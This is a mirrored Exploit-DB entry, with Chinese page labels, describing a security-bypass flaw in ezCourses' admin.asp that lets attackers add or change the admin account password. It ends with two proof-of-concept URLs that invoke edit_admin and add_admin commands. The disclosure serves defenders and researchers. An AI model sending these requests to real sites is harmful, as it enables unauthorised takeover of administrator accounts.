ezCourses – ‘admin.asp’ Security Bypass

• Exploit Database
• 57 阅读

• 作者： J.O
  日期： 2011-10-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36197/

• source: https://www.securityfocus.com/bid/49907/info
  
  ezCourses is prone to a security-bypass vulnerability because it fails to properly validate user-supplied input.
  
  Attackers could exploit the issue to bypass certain security restrictions and add or change the 'admin' account password. 
  
  http://www.example.com//ezCourses/admin/admin.asp?cmd=edit_admin&AdminID=1&Master=Master
  http://www.example.com/ezCourses/admin/admin.asp?cmd=add_admin&AdminID=1